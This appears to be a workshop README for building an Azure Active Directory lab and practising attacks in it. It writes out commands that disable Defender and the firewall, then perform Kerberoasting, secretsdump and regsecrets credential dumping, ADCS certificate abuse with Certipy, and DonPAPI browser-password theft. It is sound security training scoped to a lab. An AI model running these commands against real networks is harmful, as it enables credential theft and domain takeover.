This repo was created for the gracious folks at Wild West Hackin' Fest, who picked us up, dusted us off and said "here's another chance guys, go get 'em!" ...and who gave us an opportunity to run a rapid fire workshop about lab building.
Anyway, here's how the Defensive Origins crew builds labs!
- Lab Building 101
- Building a Lab on Azure with ARM
- Connecting to Infrastructure
- Installing Tools Rapid Fire Style
- Tools:
- Badblood
- Impacket GetADUsers.py
- Impacket GetUsersSPNs.py
- Impacket Secretsdump.py
- Impacket smbexec.py
- Impacket getTGT.py
- Impacket addcomputer.py
- Impacket regsecrets.py
- Windows ADCS
- PowerShell ADCSTemplate
- Certipy (Find/Request/Auth)
- DonPAPI
Time to deploy: Approximately 30-60 minutes
Authenticate to your Azure portal:
| π URL | Browser on Student's Local System |
|---|
https://portal.azure.comThen, go to the hosted ARM template resource page on a new browser tab:
| π URL | Browser on Students Local System |
|---|
https://www.doazlab.comAbout half way down the page, click the Deploy to Azure button.
 |
|---|
Select your subscription, resource group, and location. Document this location, it will be needed later in class.
 |
|---|
The default VM size is B2s, which are burstable, low cost, and efficient VMs. You can bump this up to larger should you choose.
 |
|---|
Your next configuration option is the network ranges allowed to access this lab's public IP addresses. We will investigate some Internet-based threats later and recommend leaving this wide open to the configured all zeroes (0.0.0.0/0) range.
 |
|---|
One more click will bring you to the validation check. After a moment, you can click on Create to start the build process for your ADD Lab Environment.
 |
|---|
The process takes between 25 and 30 minutes to fully deploy. The deployment confirmation shown next is indicative of a successful build.
 |
|---|
The Outputs option in the left navigation tree includes the access details you will need for SSH and RDP access into the lab environment. Document these IP addresses as you will need them later to access your lab infrastructure.
 |
|---|
A visual aid for your lab deployment is shown in the next image.
 |
|---|
When logging into the Windows system, use the following credentials.
doazlab\doadmin DOLabAdmin1!When logging into the Linux system, use the following credentials.
doadmin DOLabAdmin1!
The screenshot in this section demonstrates the output values from the course ARM template deployment.
You will need all of these at various points throughout the course material. You should keep them handy in a notes document or similar quick-reference.
β¨ Step Complete, Go to the next step!
Establish RDP to the workstation and domain controller (Linux with Remmina)
From Linux, you can use the Remmina remote desktop (RDP) client software.
β Note Be sure to include the domain on the initial RDP connections. doazlab\doadmin DOLabAdmin1!Establish an RDP connection to the IP address of your lab's domain controller. You will be prompted to accept a certificate that should match DC01.doazlab.com.
Establish an RDP connection to the IP address of your lab's workstation. You will be prompted to accept a certificate that should match WS05.doazlab.com.
The domain controller will prompt you to accept the discovery settings. The lab is isolated and general guidance is to click Yes.
The first login to the workstation will require approximately ten minutes to fully build the user profile and desktop environment.
β¨ Step Complete, Go to the next step!
Establish RDP connections to the workstation and domain controller (Windows terminal services client)
The following screenshot includes an example mstsc connection string. Your IP address will differ.
Be sure to include the domain on the initial RDP connections.
doazlab\doadmin DOLabAdmin1!
Establish an RDP connection to the IP address of your lab's domain controller. You will be prompted to accept a certificate that should match DC01.doazlab.com.
Establish an RDP connection to the IP address of your lab's workstation. You will be prompted to accept a certificate that should match WS05.doazlab.com.
The domain controller will prompt you to accept the discovery settings. This lab is isolated and general guidance is to click Yes.
The first login to the workstation will require approximately ten minutes to fully build the user profile and desktop environment. The desktop background includes bginfo.exe as a desktop background for quick reference as to which system you have accessed.
Run the following command on the workstation from the Admin PowerShell prompt as shown in the subsequent screenshot. Note that there is a linked PowerShell Admin invoker on the desktop.
Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled FalseThis is shown in the next screenshot.
Also, defang AV with the following commands.
πͺ PowerShell Input Workstation: WS05 New-Item -ItemType Directory -Path "C:\DOAZLab" -Force > $null Set-MpPreference -ExclusionPath 'c:\users\doadmin' Set-MpPreference -ExclusionPath 'c:\DOAZLab' Set-MpPreference -ExclusionProcess "powershell.exe", "cmd.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true Set-MpPreference -DisableRealtimeMonitoring $true Set-MpPreference -DisableScriptScanning $true Set-MpPreference -EnableControlledFolderAccess Disabled Set-MpPreference -EnableNetworkProtection AuditMode Set-MpPreference -Force -MAPSReporting Disabled Set-MpPreference -SubmitSamplesConsent NeverSendβ¨ Step Complete, Go to the next step!
π§ Bash Input Linux Host: Nux01 ssh doadmin@'YOUR-PUB-C2-IP'doadmin DOLabAdmin1!
Did you know you can SSH directly from Windows 10 without additional installation, packages, or software? You can, straight from PowerShell.
πͺ PowerShell Input ssh doadmin@'YOUR-PUB-C2-IP'
β¨ Step Complete, Go to the next step!
You need root perms for most of the tools in this lab, sudo up.
sudo -sWe packed a bunch of tools onto your Linux system during the build process. We regularly wrap python tools in virtual environments, so be prepared to activate and deactivate. Also, install virtual-env.
apt install python3-virtualenv -y Or, use pip.
pip3 install virtualenvNow, let's rock and roll. One of the tools we didn't install via bootstrap on the Linux box was DonPAPI. This is a browser shredder (and more). Copy and paste the following block into your Linux terminal.
cd /opt/
git clone https://github.com/login-securite/DonPAPI
cd DonPAPI
virtualenv -p python3 dp-env
source dp-env/bin/activate
python3 -m pip install .
DonPAPI -hJump over to the dc01 RDP session.
This tool makes a mess out of an existing lab environment, your production AD, or anywhere you run this. ** This is dangerous!!! DO NOT RUN IN PRODUCTION **
When logging into the Windows system, use the following credentials.
doazlab\doadmin
DOLabAdmin1!
Conduct Lab Operations from Domain Controller DC01
First, download and invoke BadBlood.
** This is dangerous!!! DO NOT RUN IN PRODUCTION **
The following commands should be pasted into a PowerShell terminal session on the domain controller.
πͺ PowerShell Input Domain Controller: DC01 $ProgressPreference = 'SilentlyContinue' invoke-webrequest -URI https://github.com/Relkci/BadBlood/archive/refs/heads/master.zip -outfile badblood.zip Expand-Archive .\badblood.zip $ProgressPreference = 'Continue' ./badblood/BadBlood-master/invoke-badblood.ps1
Three strikes against the enter key will result in a prompt to confirm your intentions. Again, DO NOT RUN THIS IN PRODUCTION*. The
badbloodkey word will then result in the creation of various AD objects, ACL tampering, and general pollution of your doazlab.com forest.
πͺ PowerShell Input Domain Controller: DC01 [ENTER] x 3 badbloodSome errors are expected.
Exit PowerShell's AD> Prompt!
πͺ PowerShell Input Domain Controller: DC01 exitβ¨ Step Complete, Go to the next step!
When logging into the Windows system, use the following credentials.
doazlab\doadmin DOLabAdmin1!When logging into the Linux system, use the following credentials.
doadmin DOLabAdmin1!
Conduct Lab Operations from Linux Host Nux01
Prepare the Python virtual environment (venv) to containerize Impacket's dependencies. Run the following commands to activate the environment and list the tools of Impacket.
Ensure you are root with sudo.
π§ Bash Input Linux Host: Nux01 sudo -sRun the next commands as a code-block to instantiate the venv and list the Python tools in the impacket repo.
π§ Bash Input Linux Host: Nux01 deactivate cd /opt/impacket source /root/pyenv/impacket/bin/activate cd /opt/impacket/examples ls
β¨ Step Complete, Go to the next step!
Get Active Directory User Information
This Python class was written to enumerate AD users as either individuals or all users. We are going to use it here to gather a list of users from the Active Directory environment and for later use as the user list for password spraying.
The following command is used to dump the list of AD users to the console and to create a file (tee) in the /opt/ directory called adusers.txt.
π§ Bash Input Linux Host: Nux01 GetADUsers.py -all -ts doazlab.com/doadmin:'DOLabAdmin1!' -dc-ip 192.168.2.4 |tee -a /opt/adusers.txt
β¨ Step complete. Go to the next step!
All members of the "Domain Users" group can request a service ticket for any account with a configured service principal name (SPN). This is the attack known as "Kerberoasting". The krbtgt's response to the requested service ticket operation includes a potentially crackable password hash.
Let's gather hashes from the accounts running with assigned service principal names (SPNs). Why? These are the accounts that any domain user can request Kerberos service tickets for. Thus, the Kerberoast attack.
π§ Bash Input Linux Host: Nux01 mkdir /opt/hashes/ GetUserSPNs.py 'doazlab.com'/'doadmin':'DOLabAdmin1!' -dc-ip 192.168.2.4 -outputfile /opt/hashes/kerbs.txt cat /opt/hashes/kerbs.txt |less -S
Use either
CTRL + Corqto exit this view.The SPN hashes were saved to file /opt/hashes/kerbs.txt
β¨ Step Complete, Go to the next step!
We are next going to take some liberties with our privileged position to check out Secretsdump. This tool will attempt to gather credential material from a remote system to which the analyst has recovered some form of privileged credentials.
The account credential used to access the environment has sufficient privilege to start the RemoteRegistry service and access credential material through the various secrets storage locations in Microsoft's operating systems. The next command uses secretsdump.py to attempt a remote credential dump and the tee -a command to write STDOUT to a file in the /opt/hashes/ directory.
π§ Bash Input Linux Host: Nux01 mkdir /opt/hashes secretsdump.py doazlab/doadmin:'DOLabAdmin1!'@192.168.2.5 |tee -a /opt/hashes/secrets-output.txtYou will be prompted for a password.
π§ Bash Input Linux Host: Nux01 DOLabAdmin1!
β¨ Step Complete, Go to the next step!
The smbexec.py utility establishes a semi-interactive shell to a remote host. This is not an opsec safe tool and will get caught by most EDR products.
π§ Bash Input Linux Host: Nux01 python3 smbexec.py doazlab.com/doadmin:'DOLabAdmin1!'@192.168.2.5
π§ Bash Input Linux Host: Nux01 net localgroup administrators ipconfig whoami hostname nslookup doazlab.com netsh advfirewall set allprofiles state off exit
β¨ Step Complete, Go to the next step!
The getTGT.py utility is used to request authentication tickets (Kerberos) from a known username and password (or hash) combination.
π§ Bash Input Linux Host: Nux01 python3 getTGT.py -dc-ip 192.168.2.4 doazlab.com/doadmin:'DOLabAdmin1!'
π§ Bash Input Linux Host: Nux01 ls export KRB5CCNAME=/opt/impacket/examples/doadmin.ccacheThe export process is shown in the next screenshot.
Install some additional packages for Kerberos on the Linux box with the following command.
apt-get install krb5-user libpam-krb5 libpam-ccreds -yThen run
klistto take a peek at the exported ticket[s]. After export, the ticket should look something like the following.
β¨ Step Complete, Go to the next step!
Let's use the Kerberos ticket we grabbed with getTGT.py to add a computer object to the domain. Always remember - any user can add up to ten computers to a domain by default (MS-DS-MachineAccountQuota). Trust us, you need to learn to how to use ticketing and ticketing related tools. NTLM will eventually be deprecated.
π§ Bash Input Linux Host: Nux01 python3 addcomputer.py -computer-name lowprivPC -computer-pass L0wPr1VSys -k -no-pass -dc-ip 192.168.2.4 doazlab.com/doadmin:'DOLabAdmin1!'@192.168.2.4 -dc-host dc01
β¨ Step Complete, Go to the next step!
The regsecrets.py utility was designed as an improvement on the secretsdump.py utility. Regsecrets.py conducts a fileless interrogation of a targeted system's registry.
Take a look at the tool's help file too. Kent says: "Know your tools."
π§ Bash Input Linux Host: Nux01 python3 regsecrets.py
Use the following command to quietly and filelessly dump creds from the WS05 system.
π§ Bash Input Linux Host: Nux01 python3 regsecrets.py -k -no-pass -dc-ip 192.168.2.4 doazlab.com/[email protected] |tee -a /opt/hashes/192-168-2-5-secrets
β¨ Step Complete, Go to the next step!
This lab is designed to teach participants how to install Active Directory Certificate Services (ADCS), import certificate templates using PowerShell and assess these vulnerabilities using Certipy.
Conduct Lab Operations from Domain Controller DC01
Launch PowerShell on domain controller and install some important ADCS features.
πͺ PowerShell Input Domain Controller: DC01 Get-WindowsFeature -Name AD-Certificate | Install-WindowsFeature Add-WindowsFeature Adcs-Cert-Authority -IncludeManagementTools
π§ PowerShell Input Linux Host: DC01 Next, we will download previously exported templates. First, enter the c:\add folder.
πͺ PowerShell Input Domain Controller: DC01 mkdir c:\add cd c:\addNext, download the templates with PowerShell
πͺ PowerShell Input Domain Controller: DC01 $wc = new-object System.Net.WebClient $wc.DownloadFile('https://raw.githubusercontent.com/DefensiveOrigins/ADD_Extras/main/ADCS/DOAZLab_Computer.json', 'c:\add\DOAZLab_Computer.json') $wc.DownloadFile('https://raw.githubusercontent.com/DefensiveOrigins/ADD_Extras/main/ADCS/DOAZLab_User.json', 'c:\add\DOAZLab_User.json') $wc.DownloadFile('https://raw.githubusercontent.com/DefensiveOrigins/ADD_Extras/main/ADCS/DOAZLab_IPSec.json', 'c:\add\DOAZLab_IPSec.json') ls c:\add
Next, import the certificate templates that were downloaded.
πͺ PowerShell Input Domain Controller: DC01 net1 user noprivuser N0PrivU53R /add /domain Install-Module ADCSTemplate -Force New-ADCSTemplate -DisplayName DOAZLab_Computer -JSON (Get-Content c:\add\DOAZLab_Computer.json -Raw) -Publish New-ADCSTemplate -DisplayName DOAZLab_User -JSON (Get-Content c:\add\DOAZLab_User.json -Raw) -Publish New-ADCSTemplate -DisplayName DOAZLab_IPSec -JSON (Get-Content c:\add\DOAZLab_IPSec.json -Raw) -Publish Set-ADCSTemplateACL -DisplayName DOAZLab_Computer -Enroll -Identity 'DOAZLab\Domain Computers' Set-ADCSTemplateACL -DisplayName DOAZLab_User -Enroll -Identity 'DOAZLab\Domain Users' Set-ADCSTemplateACL -DisplayName DOAZLab_IPSec -Enroll -Identity 'DOAZLab\Domain Users'
Conduct Lab Operations from Linux Host Nux01
Here, you will access a privileged terminal session, activate a virtual environment, and ask Certipy to find vulnerable ADCS templates.
The next command should not require a password (passwordless sudo).
π§ Bash Input Linux Host: Nux01 sudo -s
Next, we will run Certipy to assess the ADCS environment.
π§ Bash Input Linux Host: Nux01 cd /opt/Certipy source /root/pyenv/Certipy/bin/activate certipy find -vulnerable -target-ip 192.168.2.4 -u [email protected] -p 'N0PrivU53R' -output adcs-vulns
Inspect the produced results with the following command.
π§ Bash Input Linux Host: Nux01 cat adcs*.txt
In the next step, we will attempt to exploit one of the weak certificate templates. But, first we need to find a user SID and set a var. Basically, Microsoft tried to fix a thing with a cheesy little "protection" mechanism that required a user's SID to be submitted with a certificate request. Legit, this went from an MS patch to not fixed anymore was like 17 seconds.
π§ Bash Input Linux Host: Nux01 DOADMINSID=$(rpcclient -U noprivuser%'N0PrivU53R' 192.168.2.4 -c "lookupnames doadmin" | awk '{print $2}') printf "\n $DOADMINSID \n\n" certipy req -target-ip 192.168.2.4 -u [email protected] -p 'N0PrivU53R' -ca doazlab-DC01-CA -template DOAZLab_User -dc-ip 192.168.2.4 -upn [email protected] -sid $DOADMINSID
UnPac the Hash Attack
π§ Bash Input Linux Host: Nux01 certipy auth -pfx doadmin.pfx -dc-ip 192.168.2.4
β¨ Step Complete, Go to the next step!
On the workstation, WS05, open all three installed browsers and paste the site link below into each browser's address bar.
π URL Browsers on Workstation WS05 http://testphp.vulnweb.com/login.phpChrome will probably try and social engineer one of your personal accounts. Click the Don't sign in button in the bottom right corner of the open Chrome window.
Also click the Skip button on the next page.
And also, yeah, click through the Got it button regarding Chrome's Enhanced ad privacy.
Finally, drop the URL in all the browser address bars.
http://testphp.vulnweb.com/login.php
Enter the following credentials in the respective browsers.
Chrome Input:
- Username:
chromeuser- Password:
chromepass1!After inputting username and password values, follow the operations described below and shown in the subsequent screenshot.
- Click Login button.
- Click the circled key in the right portion of the address bar.
- Click Save to retain the credential in the browser.
Firefox:
- Username:
ffuser- Password:
firefoxpass1!Firefox should prompt you to save any credential entered in this form. So, enter the credential and click Login.
As shown next, you should be prompted to save the credential. Click Save.
Edge:
- Username:
edgeuser- Password:
edgepass1!The process for saving the password in Edge is similar. After clicking Login, click the ellipsis at the far right of the address bar. You will be prompted to and should click on Manage Passwords.
After clicking on Manage Passwords, you should be prompted to save the
edgeusercredential entered in this form.
The following command will gather all passwords stored in browsers on the WS05 system at 192.168.2.5.
π§ Bash Input Linux Host: Nux01 deactivate cd /opt/DonPAPI source dp-env/bin/activate donpapi collect -u doadmin -p 'DOLabAdmin1!' -t 192.168.2.5 --domain doazlab.com
Open a browser and search
stealer logs 101.An interesting link: https://www.zerofox.com/blog/an-introduction-to-stealer-logs/
Defensive Origins offers the following classes at Antisyphon Training:
-
Assumed Compromise
https://www.antisyphontraining.com/assumed-compromise/ -
Active Directory Security Hardening
https://www.antisyphontraining.com/product/active-directory-security-and-hardening-with-jordan-drysdale-and-kent-ickler/
